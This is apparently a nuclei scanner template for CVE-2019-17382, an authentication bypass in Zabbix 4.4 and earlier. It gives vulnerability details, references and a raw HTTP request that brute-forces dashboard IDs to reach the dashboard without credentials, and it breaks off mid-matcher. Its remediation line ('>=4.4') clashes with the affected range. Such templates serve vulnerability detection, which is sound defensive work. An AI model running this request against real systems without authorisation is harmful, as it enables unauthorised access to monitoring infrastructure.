id: CVE-2019-17382 info: name: Zabbix <=4.4 - Authentication Bypass author: harshbothra_ severity: critical description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin. impact: | Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Zabbix application. remediation: | Upgrade to a patched version of Zabbix (>=4.4) to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/47467 - https://nvd.nist.gov/vuln/detail/CVE-2019-17382 - https://lists.debian.org/debian-lts-announce/2023/08/msg00027.html - https://github.com/huimzjty/vulwiki - https://github.com/merlinepedra25/nuclei-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2019-17382 cwe-id: CWE-639 epss-score: 0.3141 epss-percentile: 0.96581 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 100 vendor: zabbix product: zabbix tags: cve2019,cve,brute-force,auth-bypass,login,edb,zabbix http: - raw: - | GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1 Host: {{Hostname}} payloads: ids: helpers/wordlists/numbers.txt stop-at-first-match: true threads: 50 matchers-condition: and matchers: - type: word words: - "